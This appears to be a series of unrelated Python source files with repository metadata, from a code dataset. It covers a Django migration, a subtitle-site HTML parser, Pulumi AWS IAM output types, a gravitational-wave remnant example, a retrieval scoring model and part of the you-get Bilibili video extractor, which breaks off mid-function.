| 0.603995
|
138669b132da9dea08d56de2d0715d72e59419e9
| 365
|
py
|
Python
|
apphv/mainUser/migrations/0025_auto_20190624_1503.py
|
FerneyMoreno20/Portfolio
|
59eaa4f4f6762386fe84450f65f508be1414f857
|
[
"bzip2-1.0.6"
] | null | null | null |
apphv/mainUser/migrations/0025_auto_20190624_1503.py
|
FerneyMoreno20/Portfolio
|
59eaa4f4f6762386fe84450f65f508be1414f857
|
[
"bzip2-1.0.6"
] | 6
|
2019-12-04T23:34:47.000Z
|
2021-06-09T18:01:16.000Z
|
apphv/mainUser/migrations/0025_auto_20190624_1503.py
|
FerneyMoreno20/Portfolio
|
59eaa4f4f6762386fe84450f65f508be1414f857
|
[
"bzip2-1.0.6"
] | null | null | null |
# Generated by Django 2.2.2 on 2019-06-24 15:03
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('mainUser', '0024_auto_20190624_1458'),
]
operations = [
migrations.RenameField(
model_name='usuarios',
old_name='IdUsuario',
new_name='id',
),
]
| 19.210526
| 48
| 0.586301
|
ed4b3e7585648338bb412b171701a067776a65ae
| 3,681
|
py
|
Python
|
Contents/Code/parser.py
|
balesz/SuperSubtitles.bundle
|
6df8346afea88c030c59ac7c22980575d835be4b
|
[
"Apache-2.0"
] | 9
|
2015-12-30T12:59:55.000Z
|
2022-01-09T19:57:37.000Z
|
Contents/Code/parser.py
|
balesz/SuperSubtitles.bundle
|
6df8346afea88c030c59ac7c22980575d835be4b
|
[
"Apache-2.0"
] | 1
|
2016-11-14T12:15:14.000Z
|
2016-11-14T12:15:14.000Z
|
Contents/Code/parser.py
|
balesz/SuperSubtitles.bundle
|
6df8346afea88c030c59ac7c22980575d835be4b
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
import re
from HTMLParser import HTMLParser
def clear_html(value):
start_pattern = "<!--Az eredménytáblázat ELEJE-->"
end_pattern = "<!--Az eredménytáblázat VÉGE-->"
if value.find(start_pattern) > 0 and value.find(end_pattern) > 0:
return value[value.find(start_pattern):value.find(end_pattern) + len(end_pattern)]
return value
class SubtitleInfo:
def __init__(self):
self.id = None
self.name = None
self.filename = None
self.is_movie = False
self.show_id = None
self.imdb_id = None
self.tvdb_id = None
# noinspection PyAugmentAssignment
class ResultParser(HTMLParser):
def __init__(self, raw):
HTMLParser.__init__(self)
self.level = 0
self.data = None
self.processing = False
self.need_reading_data = False
self.results = []
self.subtitle = None
self.feed(clear_html(raw))
def handle_starttag(self, tag, attrs):
if tag == "tr":
self.level = self.level + 1
for attr in attrs:
if attr == ("id", "vilagit"):
self.subtitle = SubtitleInfo()
self.level = 1
self.processing = True
if self.processing:
if tag == "a":
self.get_show_id(attrs[0][1])
self.get_subtitle_id(attrs[0][1])
self.get_subtitle_name(attrs[0][1])
if tag == "div" and attrs[0] == ("class", "eredeti"):
self.data = ""
self.need_reading_data = True
def handle_data(self, data):
if self.need_reading_data:
self.data = self.data + data
def handle_endtag(self, tag):
if tag == "div" and self.need_reading_data:
self.get_name(self.data)
self.data = None
self.need_reading_data = False
if tag == "tr":
if self.processing and self.level > 0:
self.level = self.level - 1
if self.processing and self.level == 0:
self.results.append(self.subtitle)
self.subtitle = None
self.processing = False
def error(self, message):
pass
def get_name(self, value):
self.subtitle.name = value
def get_show_id(self, value):
match = re.search(r'index\.php\?([fs]id)=(\d*)', value)
if match:
self.subtitle.is_movie = match.group(1) == 'fid'
self.subtitle.show_id = match.group(2)
def get_subtitle_id(self, value):
match = re.search(r'/index\.php\?action=letolt&fnev=.*&felirat=(\d*)', value)
if match:
self.subtitle.id = match.group(1)
def get_subtitle_name(self, value):
match = re.search(r'/index\.php\?action=letolt&fnev=(.*)&felirat=\d*', value)
if match:
self.subtitle.filename = match.group(1)
class DescriptionParser(HTMLParser):
metadata = SubtitleInfo()
def __init__(self, metadata, description):
HTMLParser.__init__(self)
self.metadata = metadata
self.feed(clear_html(description))
def handle_starttag(self, tag, attrs):
if tag == 'a' and len(attrs) == 3 and attrs[2] == ('alt', 'iMDB'):
            match = re.search(r'^.*/(tt\d*)/?$', attrs[0][1])
if match:
self.metadata.imdb_id = match.group(1)
if tag == 'a' and len(attrs) == 3 and attrs[2] == ('alt', 'TheTVDB'):
            match = re.search(r'^.*id=(\d*)$', attrs[0][1])
if match:
self.metadata.tvdb_id = match.group(1)
def error(self, message):
pass
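# Illustrative sketch (not part of the original plugin, never called here): a minimal
# result-table row shaped like the markup ResultParser expects above; every value in it
# is made up.
_SAMPLE_ROW = (
    '<tr id="vilagit">'
    '<td><a href="index.php?fid=123">Example Movie</a></td>'
    '<td><div class="eredeti">Example Movie (2020)</div></td>'
    '<td><a href="/index.php?action=letolt&fnev=example.srt&felirat=456">download</a></td>'
    '</tr>'
)
def _example_parse():
    sub = ResultParser(_SAMPLE_ROW).results[0]
    # expected: sub.show_id == '123', sub.is_movie is True, sub.id == '456',
    # sub.filename == 'example.srt', sub.name == 'Example Movie (2020)'
    return sub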
| 32.008696
| 90
| 0.556642
|
80ead79911eac3d83aa6f65a4a17cfcf78003efc
| 14,694
|
py
|
Python
|
sdk/python/pulumi_aws/iam/outputs.py
|
wgarcia79/pulumi-aws
|
c63c224734f1d72ba84986a33f36413c9f9cbe27
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-11-10T16:33:40.000Z
|
2021-11-10T16:33:40.000Z
|
sdk/python/pulumi_aws/iam/outputs.py
|
wgarcia79/pulumi-aws
|
c63c224734f1d72ba84986a33f36413c9f9cbe27
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/iam/outputs.py
|
wgarcia79/pulumi-aws
|
c63c224734f1d72ba84986a33f36413c9f9cbe27
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._enums import *
__all__ = [
'RoleInlinePolicy',
'GetGroupUserResult',
'GetPolicyDocumentStatementResult',
'GetPolicyDocumentStatementConditionResult',
'GetPolicyDocumentStatementNotPrincipalResult',
'GetPolicyDocumentStatementPrincipalResult',
]
@pulumi.output_type
class RoleInlinePolicy(dict):
def __init__(__self__, *,
name: Optional[str] = None,
policy: Optional[str] = None):
"""
:param str name: Name of the role policy.
:param str policy: Policy document as a JSON formatted string.
"""
if name is not None:
pulumi.set(__self__, "name", name)
if policy is not None:
pulumi.set(__self__, "policy", policy)
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Name of the role policy.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def policy(self) -> Optional[str]:
"""
Policy document as a JSON formatted string.
"""
return pulumi.get(self, "policy")
@pulumi.output_type
class GetGroupUserResult(dict):
def __init__(__self__, *,
arn: str,
path: str,
user_id: str,
user_name: str):
"""
:param str arn: The Amazon Resource Name (ARN) specifying the iam user.
:param str path: The path to the iam user.
:param str user_id: The stable and unique string identifying the iam user.
:param str user_name: The name of the iam user.
"""
pulumi.set(__self__, "arn", arn)
pulumi.set(__self__, "path", path)
pulumi.set(__self__, "user_id", user_id)
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter
def arn(self) -> str:
"""
The Amazon Resource Name (ARN) specifying the iam user.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter
def path(self) -> str:
"""
The path to the iam user.
"""
return pulumi.get(self, "path")
@property
@pulumi.getter(name="userId")
def user_id(self) -> str:
"""
The stable and unique string identifying the iam user.
"""
return pulumi.get(self, "user_id")
@property
@pulumi.getter(name="userName")
def user_name(self) -> str:
"""
The name of the iam user.
"""
return pulumi.get(self, "user_name")
@pulumi.output_type
class GetPolicyDocumentStatementResult(dict):
def __init__(__self__, *,
actions: Optional[Sequence[str]] = None,
conditions: Optional[Sequence['outputs.GetPolicyDocumentStatementConditionResult']] = None,
effect: Optional[str] = None,
not_actions: Optional[Sequence[str]] = None,
not_principals: Optional[Sequence['outputs.GetPolicyDocumentStatementNotPrincipalResult']] = None,
not_resources: Optional[Sequence[str]] = None,
principals: Optional[Sequence['outputs.GetPolicyDocumentStatementPrincipalResult']] = None,
resources: Optional[Sequence[str]] = None,
sid: Optional[str] = None):
"""
:param Sequence[str] actions: List of actions that this statement either allows or denies. For example, `["ec2:RunInstances", "s3:*"]`.
:param Sequence['GetPolicyDocumentStatementConditionArgs'] conditions: Configuration block for a condition. Detailed below.
:param str effect: Whether this statement allows or denies the given actions. Valid values are `Allow` and `Deny`. Defaults to `Allow`.
:param Sequence[str] not_actions: List of actions that this statement does *not* apply to. Use to apply a policy statement to all actions *except* those listed.
:param Sequence['GetPolicyDocumentStatementNotPrincipalArgs'] not_principals: Like `principals` except these are principals that the statement does *not* apply to.
:param Sequence[str] not_resources: List of resource ARNs that this statement does *not* apply to. Use to apply a policy statement to all resources *except* those listed.
:param Sequence['GetPolicyDocumentStatementPrincipalArgs'] principals: Configuration block for principals. Detailed below.
:param Sequence[str] resources: List of resource ARNs that this statement applies to. This is required by AWS if used for an IAM policy.
:param str sid: Sid (statement ID) is an identifier for a policy statement.
"""
if actions is not None:
pulumi.set(__self__, "actions", actions)
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
if effect is not None:
pulumi.set(__self__, "effect", effect)
if not_actions is not None:
pulumi.set(__self__, "not_actions", not_actions)
if not_principals is not None:
pulumi.set(__self__, "not_principals", not_principals)
if not_resources is not None:
pulumi.set(__self__, "not_resources", not_resources)
if principals is not None:
pulumi.set(__self__, "principals", principals)
if resources is not None:
pulumi.set(__self__, "resources", resources)
if sid is not None:
pulumi.set(__self__, "sid", sid)
@property
@pulumi.getter
def actions(self) -> Optional[Sequence[str]]:
"""
List of actions that this statement either allows or denies. For example, `["ec2:RunInstances", "s3:*"]`.
"""
return pulumi.get(self, "actions")
@property
@pulumi.getter
def conditions(self) -> Optional[Sequence['outputs.GetPolicyDocumentStatementConditionResult']]:
"""
Configuration block for a condition. Detailed below.
"""
return pulumi.get(self, "conditions")
@property
@pulumi.getter
def effect(self) -> Optional[str]:
"""
Whether this statement allows or denies the given actions. Valid values are `Allow` and `Deny`. Defaults to `Allow`.
"""
return pulumi.get(self, "effect")
@property
@pulumi.getter(name="notActions")
def not_actions(self) -> Optional[Sequence[str]]:
"""
List of actions that this statement does *not* apply to. Use to apply a policy statement to all actions *except* those listed.
"""
return pulumi.get(self, "not_actions")
@property
@pulumi.getter(name="notPrincipals")
def not_principals(self) -> Optional[Sequence['outputs.GetPolicyDocumentStatementNotPrincipalResult']]:
"""
Like `principals` except these are principals that the statement does *not* apply to.
"""
return pulumi.get(self, "not_principals")
@property
@pulumi.getter(name="notResources")
def not_resources(self) -> Optional[Sequence[str]]:
"""
List of resource ARNs that this statement does *not* apply to. Use to apply a policy statement to all resources *except* those listed.
"""
return pulumi.get(self, "not_resources")
@property
@pulumi.getter
def principals(self) -> Optional[Sequence['outputs.GetPolicyDocumentStatementPrincipalResult']]:
"""
Configuration block for principals. Detailed below.
"""
return pulumi.get(self, "principals")
@property
@pulumi.getter
def resources(self) -> Optional[Sequence[str]]:
"""
List of resource ARNs that this statement applies to. This is required by AWS if used for an IAM policy.
"""
return pulumi.get(self, "resources")
@property
@pulumi.getter
def sid(self) -> Optional[str]:
"""
Sid (statement ID) is an identifier for a policy statement.
"""
return pulumi.get(self, "sid")
@pulumi.output_type
class GetPolicyDocumentStatementConditionResult(dict):
def __init__(__self__, *,
test: str,
values: Sequence[str],
variable: str):
"""
:param str test: Name of the [IAM condition operator](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements_condition_operators.html) to evaluate.
:param Sequence[str] values: Values to evaluate the condition against. If multiple values are provided, the condition matches if at least one of them applies. That is, AWS evaluates multiple values as though using an "OR" boolean operation.
:param str variable: Name of a [Context Variable](http://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements.html#AvailableKeys) to apply the condition to. Context variables may either be standard AWS variables starting with `aws:` or service-specific variables prefixed with the service name.
"""
pulumi.set(__self__, "test", test)
pulumi.set(__self__, "values", values)
pulumi.set(__self__, "variable", variable)
@property
@pulumi.getter
def test(self) -> str:
"""
Name of the [IAM condition operator](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements_condition_operators.html) to evaluate.
"""
return pulumi.get(self, "test")
@property
@pulumi.getter
def values(self) -> Sequence[str]:
"""
Values to evaluate the condition against. If multiple values are provided, the condition matches if at least one of them applies. That is, AWS evaluates multiple values as though using an "OR" boolean operation.
"""
return pulumi.get(self, "values")
@property
@pulumi.getter
def variable(self) -> str:
"""
Name of a [Context Variable](http://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements.html#AvailableKeys) to apply the condition to. Context variables may either be standard AWS variables starting with `aws:` or service-specific variables prefixed with the service name.
"""
return pulumi.get(self, "variable")
@pulumi.output_type
class GetPolicyDocumentStatementNotPrincipalResult(dict):
def __init__(__self__, *,
identifiers: Sequence[str],
type: str):
"""
:param Sequence[str] identifiers: List of identifiers for principals. When `type` is `AWS`, these are IAM principal ARNs, e.g., `arn:aws:iam::12345678901:role/yak-role`. When `type` is `Service`, these are AWS Service roles, e.g., `lambda.amazonaws.com`. When `type` is `Federated`, these are web identity users or SAML provider ARNs, e.g., `accounts.google.com` or `arn:aws:iam::12345678901:saml-provider/yak-saml-provider`. When `type` is `CanonicalUser`, these are [canonical user IDs](https://docs.aws.amazon.com/general/latest/gr/acct-identifiers.html#FindingCanonicalId), e.g., `79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be`.
:param str type: Type of principal. Valid values include `AWS`, `Service`, `Federated`, `CanonicalUser` and `*`.
"""
pulumi.set(__self__, "identifiers", identifiers)
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def identifiers(self) -> Sequence[str]:
"""
List of identifiers for principals. When `type` is `AWS`, these are IAM principal ARNs, e.g., `arn:aws:iam::12345678901:role/yak-role`. When `type` is `Service`, these are AWS Service roles, e.g., `lambda.amazonaws.com`. When `type` is `Federated`, these are web identity users or SAML provider ARNs, e.g., `accounts.google.com` or `arn:aws:iam::12345678901:saml-provider/yak-saml-provider`. When `type` is `CanonicalUser`, these are [canonical user IDs](https://docs.aws.amazon.com/general/latest/gr/acct-identifiers.html#FindingCanonicalId), e.g., `79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be`.
"""
return pulumi.get(self, "identifiers")
@property
@pulumi.getter
def type(self) -> str:
"""
Type of principal. Valid values include `AWS`, `Service`, `Federated`, `CanonicalUser` and `*`.
"""
return pulumi.get(self, "type")
@pulumi.output_type
class GetPolicyDocumentStatementPrincipalResult(dict):
def __init__(__self__, *,
identifiers: Sequence[str],
type: str):
"""
:param Sequence[str] identifiers: List of identifiers for principals. When `type` is `AWS`, these are IAM principal ARNs, e.g., `arn:aws:iam::12345678901:role/yak-role`. When `type` is `Service`, these are AWS Service roles, e.g., `lambda.amazonaws.com`. When `type` is `Federated`, these are web identity users or SAML provider ARNs, e.g., `accounts.google.com` or `arn:aws:iam::12345678901:saml-provider/yak-saml-provider`. When `type` is `CanonicalUser`, these are [canonical user IDs](https://docs.aws.amazon.com/general/latest/gr/acct-identifiers.html#FindingCanonicalId), e.g., `79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be`.
:param str type: Type of principal. Valid values include `AWS`, `Service`, `Federated`, `CanonicalUser` and `*`.
"""
pulumi.set(__self__, "identifiers", identifiers)
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def identifiers(self) -> Sequence[str]:
"""
List of identifiers for principals. When `type` is `AWS`, these are IAM principal ARNs, e.g., `arn:aws:iam::12345678901:role/yak-role`. When `type` is `Service`, these are AWS Service roles, e.g., `lambda.amazonaws.com`. When `type` is `Federated`, these are web identity users or SAML provider ARNs, e.g., `accounts.google.com` or `arn:aws:iam::12345678901:saml-provider/yak-saml-provider`. When `type` is `CanonicalUser`, these are [canonical user IDs](https://docs.aws.amazon.com/general/latest/gr/acct-identifiers.html#FindingCanonicalId), e.g., `79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be`.
"""
return pulumi.get(self, "identifiers")
@property
@pulumi.getter
def type(self) -> str:
"""
Type of principal. Valid values include `AWS`, `Service`, `Federated`, `CanonicalUser` and `*`.
"""
return pulumi.get(self, "type")
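# Illustrative sketch (not part of the generated SDK, never called here): the output
# types above are what `iam.get_policy_document` returns.  The bucket ARN, account id
# and statement values are made up, and the package import is done lazily to avoid a
# circular import while this module is being loaded.
def _example_policy_document_json() -> str:
    import pulumi_aws as aws
    doc = aws.iam.get_policy_document(statements=[
        aws.iam.GetPolicyDocumentStatementArgs(
            sid="AllowRead",
            effect="Allow",
            actions=["s3:GetObject"],
            resources=["arn:aws:s3:::example-bucket/*"],
            principals=[aws.iam.GetPolicyDocumentStatementPrincipalArgs(
                type="AWS",
                identifiers=["arn:aws:iam::123456789012:root"])])])
    return doc.json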
| 46.353312
| 660
| 0.658704
|
242494bfe92849b6fd51c6d6787900e6cbeb36c8
| 429
|
py
|
Python
|
examples/phend-fring.py
|
LBJ-Wade/phenom_gw_waveform
|
2c705e6ba85510c573d23dca8be4456665d29edf
|
[
"MIT"
] | 1
|
2020-05-12T00:55:53.000Z
|
2020-05-12T00:55:53.000Z
|
examples/phend-fring.py
|
LBJ-Wade/phenom_gw_waveform
|
2c705e6ba85510c573d23dca8be4456665d29edf
|
[
"MIT"
] | null | null | null |
examples/phend-fring.py
|
LBJ-Wade/phenom_gw_waveform
|
2c705e6ba85510c573d23dca8be4456665d29edf
|
[
"MIT"
] | 1
|
2021-04-10T22:31:49.000Z
|
2021-04-10T22:31:49.000Z
|
import phenom
eta, chi1z, chi2z = 0.25, 0., 0.
fin_spin = phenom.remnant.FinalSpin0815(eta, chi1z, chi2z)
fring = phenom.remnant.fring(eta, chi1z, chi2z, fin_spin)
fdamp = phenom.remnant.fdamp(eta, chi1z, chi2z, fin_spin)
print("ringdown frequency in geometric units = ", fring)
print("imaginary part of the ringdown frequency = ", fdamp)
Mtot = 100.  # Msol
print("ringdown frequency in Hz = ", phenom.MftoHz(fring, Mtot))
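# Cross-check of the geometric-to-Hz conversion above (not part of the original example):
# with MTSUN = G*Msun/c**3 (one solar mass expressed in seconds, ~4.93e-6 s), the relation
# is f_Hz = fring / (Mtot * MTSUN).  The physical constants below are standard values.
G = 6.67430e-11       # m^3 kg^-1 s^-2
c = 2.99792458e8      # m / s
Msun = 1.98892e30     # kg
MTSUN = G * Msun / c**3
print("manual conversion check (Hz) = ", fring / (Mtot * MTSUN))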
| 21.45
| 63
| 0.724942
|
699085dae58f034ac76954056534702bf3e8b741
| 543
|
py
|
Python
|
manage.py
|
AlishaOne/onestop4you2
|
1d75ce3af56adfe884fd1953292dc070c7c4f23c
|
[
"MIT"
] | 1
|
2018-04-20T07:03:20.000Z
|
2018-04-20T07:03:20.000Z
|
manage.py
|
AlishaOne/onestop4you2
|
1d75ce3af56adfe884fd1953292dc070c7c4f23c
|
[
"MIT"
] | null | null | null |
manage.py
|
AlishaOne/onestop4you2
|
1d75ce3af56adfe884fd1953292dc070c7c4f23c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "onestop4you.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| 33.9375
| 75
| 0.688766
|
14cea8165c7c5ddfaf30384a9707b29b37016d05
| 483
|
py
|
Python
|
parrot/model/model_piv.py
|
wayne-batman/Parrot
|
d93c5132e3803917ccdd69dd3160253d1b6b3536
|
[
"Apache-2.0"
] | 14
|
2019-07-21T16:39:43.000Z
|
2021-06-21T09:13:28.000Z
|
parrot/model/model_piv.py
|
wayne-batman/Parrot
|
d93c5132e3803917ccdd69dd3160253d1b6b3536
|
[
"Apache-2.0"
] | null | null | null |
parrot/model/model_piv.py
|
wayne-batman/Parrot
|
d93c5132e3803917ccdd69dd3160253d1b6b3536
|
[
"Apache-2.0"
] | 1
|
2019-09-08T13:13:27.000Z
|
2019-09-08T13:13:27.000Z
|
import math
from parrot.core import *
class PIVModel(Model):
def __init__(self, s=0.25):
self.s = s
def score_term(self, tf: float, dtn: float, dl: float, ql: float, ctf: float,
df: float, qtf: float, ctn: float, C: float, N: float):
s = self.s
avdl = C / N
part3 = math.log((N + 1) / df)
part1 = (1 + math.log(1 + math.log(tf))) / ((1 - s) + s * dl / avdl)
score = part1 * qtf * part3
return score
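# Illustrative worked call (not part of Parrot itself, never called here): all numbers
# are made up.  With dl equal to the average document length (dl = C/N), df=10 and
# N=1000, the score is (1 + ln(1 + ln 3)) * qtf * ln(1001/10), roughly 8.0.
def _example_score():
    model = PIVModel(s=0.25)
    return model.score_term(tf=3., dtn=0., dl=120., ql=5., ctf=0., df=10.,
                            qtf=1., ctn=0., C=120000., N=1000.)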
| 30.1875
| 81
| 0.519669
|
7ea626f89da5922daed66095e0b6646226c8b315
| 40,554
|
py
|
Python
|
src/you_get/extractors/bilibili.py
|
TL-Yao/you-get
|
bf218bb27d81e27783680a6acb2d7ce8305cb880
|
[
"MIT"
] | null | null | null |
src/you_get/extractors/bilibili.py
|
TL-Yao/you-get
|
bf218bb27d81e27783680a6acb2d7ce8305cb880
|
[
"MIT"
] | null | null | null |
src/you_get/extractors/bilibili.py
|
TL-Yao/you-get
|
bf218bb27d81e27783680a6acb2d7ce8305cb880
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
from ..common import *
from ..extractor import VideoExtractor
import hashlib
class Bilibili(VideoExtractor):
name = "Bilibili"
# Bilibili media encoding options, in descending quality order.
stream_types = [
{'id': 'hdflv2_4k', 'quality': 120, 'audio_quality': 30280,
'container': 'FLV', 'video_resolution': '2160p', 'desc': '超清 4K'},
{'id': 'flv_p60', 'quality': 116, 'audio_quality': 30280,
'container': 'FLV', 'video_resolution': '1080p', 'desc': '高清 1080P60'},
{'id': 'hdflv2', 'quality': 112, 'audio_quality': 30280,
'container': 'FLV', 'video_resolution': '1080p', 'desc': '高清 1080P+'},
{'id': 'flv', 'quality': 80, 'audio_quality': 30280,
'container': 'FLV', 'video_resolution': '1080p', 'desc': '高清 1080P'},
{'id': 'flv720_p60', 'quality': 74, 'audio_quality': 30280,
'container': 'FLV', 'video_resolution': '720p', 'desc': '高清 720P60'},
{'id': 'flv720', 'quality': 64, 'audio_quality': 30280,
'container': 'FLV', 'video_resolution': '720p', 'desc': '高清 720P'},
{'id': 'hdmp4', 'quality': 48, 'audio_quality': 30280,
'container': 'MP4', 'video_resolution': '720p', 'desc': '高清 720P (MP4)'},
{'id': 'flv480', 'quality': 32, 'audio_quality': 30280,
'container': 'FLV', 'video_resolution': '480p', 'desc': '清晰 480P'},
{'id': 'flv360', 'quality': 16, 'audio_quality': 30216,
'container': 'FLV', 'video_resolution': '360p', 'desc': '流畅 360P'},
# 'quality': 15?
{'id': 'mp4', 'quality': 0},
{'id': 'jpg', 'quality': 0},
]
@staticmethod
def height_to_quality(height, qn):
if height <= 360 and qn <= 16:
return 16
elif height <= 480 and qn <= 32:
return 32
elif height <= 720 and qn <= 64:
return 64
elif height <= 1080 and qn <= 80:
return 80
elif height <= 1080 and qn <= 112:
return 112
else:
return 120
@staticmethod
def bilibili_headers(referer=None, cookie=None):
# a reasonable UA
ua = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'
headers = {'Accept': '*/*', 'Accept-Language': 'en-US,en;q=0.5', 'User-Agent': ua}
if referer is not None:
headers.update({'Referer': referer})
if cookie is not None:
headers.update({'Cookie': cookie})
return headers
@staticmethod
def bilibili_api(avid, cid, qn=0):
return 'https://api.bilibili.com/x/player/playurl?avid=%s&cid=%s&qn=%s&type=&otype=json&fnver=0&fnval=16&fourk=1' % (avid, cid, qn)
@staticmethod
def bilibili_audio_api(sid):
return 'https://www.bilibili.com/audio/music-service-c/web/url?sid=%s' % sid
@staticmethod
def bilibili_audio_info_api(sid):
return 'https://www.bilibili.com/audio/music-service-c/web/song/info?sid=%s' % sid
@staticmethod
def bilibili_audio_menu_info_api(sid):
return 'https://www.bilibili.com/audio/music-service-c/web/menu/info?sid=%s' % sid
@staticmethod
def bilibili_audio_menu_song_api(sid, ps=100):
return 'https://www.bilibili.com/audio/music-service-c/web/song/of-menu?sid=%s&pn=1&ps=%s' % (sid, ps)
@staticmethod
def bilibili_bangumi_api(avid, cid, ep_id, qn=0, fnval=16):
return 'https://api.bilibili.com/pgc/player/web/playurl?avid=%s&cid=%s&qn=%s&type=&otype=json&ep_id=%s&fnver=0&fnval=%s' % (avid, cid, qn, ep_id, fnval)
@staticmethod
def bilibili_interface_api(cid, qn=0):
entropy = 'rbMCKn@KuamXWlPMoJGsKcbiJKUfkPF_8dABscJntvqhRSETg'
appkey, sec = ''.join([chr(ord(i) + 2) for i in entropy[::-1]]).split(':')
params = 'appkey=%s&cid=%s&otype=json&qn=%s&quality=%s&type=' % (appkey, cid, qn, qn)
chksum = hashlib.md5(bytes(params + sec, 'utf8')).hexdigest()
return 'https://interface.bilibili.com/v2/playurl?%s&sign=%s' % (params, chksum)
@staticmethod
def bilibili_live_api(cid):
return 'https://api.live.bilibili.com/room/v1/Room/playUrl?cid=%s&quality=0&platform=web' % cid
@staticmethod
def bilibili_live_room_info_api(room_id):
return 'https://api.live.bilibili.com/room/v1/Room/get_info?room_id=%s' % room_id
@staticmethod
def bilibili_live_room_init_api(room_id):
return 'https://api.live.bilibili.com/room/v1/Room/room_init?id=%s' % room_id
@staticmethod
def bilibili_space_channel_api(mid, cid, pn=1, ps=100):
return 'https://api.bilibili.com/x/space/channel/video?mid=%s&cid=%s&pn=%s&ps=%s&order=0&jsonp=jsonp' % (mid, cid, pn, ps)
@staticmethod
def bilibili_space_favlist_api(fid, pn=1, ps=20):
return 'https://api.bilibili.com/x/v3/fav/resource/list?media_id=%s&pn=%s&ps=%s&order=mtime&type=0&tid=0&jsonp=jsonp' % (fid, pn, ps)
@staticmethod
def bilibili_space_video_api(mid, pn=1, ps=100):
return 'https://space.bilibili.com/ajax/member/getSubmitVideos?mid=%s&page=%s&pagesize=%s&order=0&jsonp=jsonp' % (mid, pn, ps)
@staticmethod
def bilibili_vc_api(video_id):
return 'https://api.vc.bilibili.com/clip/v1/video/detail?video_id=%s' % video_id
@staticmethod
def bilibili_h_api(doc_id):
return 'https://api.vc.bilibili.com/link_draw/v1/doc/detail?doc_id=%s' % doc_id
@staticmethod
def url_size(url, faker=False, headers={},err_value=0):
try:
return url_size(url,faker,headers)
except:
return err_value
def prepare(self, **kwargs):
self.stream_qualities = {s['quality']: s for s in self.stream_types}
try:
html_content = get_content(self.url, headers=self.bilibili_headers(referer=self.url))
except:
html_content = '' # live always returns 400 (why?)
#self.title = match1(html_content,
# r'<h1 title="([^"]+)"')
# redirect: watchlater
if re.match(r'https?://(www\.)?bilibili\.com/watchlater/#/(av(\d+)|BV(\S+)/?)', self.url):
avid = match1(self.url, r'/(av\d+)') or match1(self.url, r'/(BV\w+)')
p = int(match1(self.url, r'/p(\d+)') or '1')
self.url = 'https://www.bilibili.com/video/%s?p=%s' % (avid, p)
html_content = get_content(self.url, headers=self.bilibili_headers())
# redirect: bangumi/play/ss -> bangumi/play/ep
# redirect: bangumi.bilibili.com/anime -> bangumi/play/ep
elif re.match(r'https?://(www\.)?bilibili\.com/bangumi/play/ss(\d+)', self.url) or \
re.match(r'https?://bangumi\.bilibili\.com/anime/(\d+)/play', self.url):
initial_state_text = match1(html_content, r'__INITIAL_STATE__=(.*?);\(function\(\)') # FIXME
initial_state = json.loads(initial_state_text)
ep_id = initial_state['epList'][0]['id']
self.url = 'https://www.bilibili.com/bangumi/play/ep%s' % ep_id
html_content = get_content(self.url, headers=self.bilibili_headers(referer=self.url))
# sort it out
if re.match(r'https?://(www\.)?bilibili\.com/audio/au(\d+)', self.url):
sort = 'audio'
elif re.match(r'https?://(www\.)?bilibili\.com/bangumi/play/ep(\d+)', self.url):
sort = 'bangumi'
elif match1(html_content, r'<meta property="og:url" content="(https://www.bilibili.com/bangumi/play/[^"]+)"'):
sort = 'bangumi'
elif re.match(r'https?://live\.bilibili\.com/', self.url):
sort = 'live'
elif re.match(r'https?://vc\.bilibili\.com/video/(\d+)', self.url):
sort = 'vc'
elif re.match(r'https?://(www\.)?bilibili\.com/video/(av(\d+)|(BV(\S+)))', self.url):
sort = 'video'
elif re.match(r'https?://h\.?bilibili\.com/(\d+)', self.url):
sort = 'h'
else:
self.download_playlist_by_url(self.url, **kwargs)
return
# regular av video
if sort == 'video':
initial_state_text = match1(html_content, r'__INITIAL_STATE__=(.*?);\(function\(\)') # FIXME
initial_state = json.loads(initial_state_text)
playinfo_text = match1(html_content, r'__playinfo__=(.*?)</script><script>') # FIXME
playinfo = json.loads(playinfo_text) if playinfo_text else None
html_content_ = get_content(self.url, headers=self.bilibili_headers(cookie='CURRENT_FNVAL=16'))
playinfo_text_ = match1(html_content_, r'__playinfo__=(.*?)</script><script>') # FIXME
playinfo_ = json.loads(playinfo_text_) if playinfo_text_ else None
# warn if it is a multi-part video
pn = initial_state['videoData']['videos']
if pn > 1 and not kwargs.get('playlist'):
log.w('This is a multipart video. (use --playlist to download all parts.)')
# set video title
self.title = initial_state['videoData']['title']
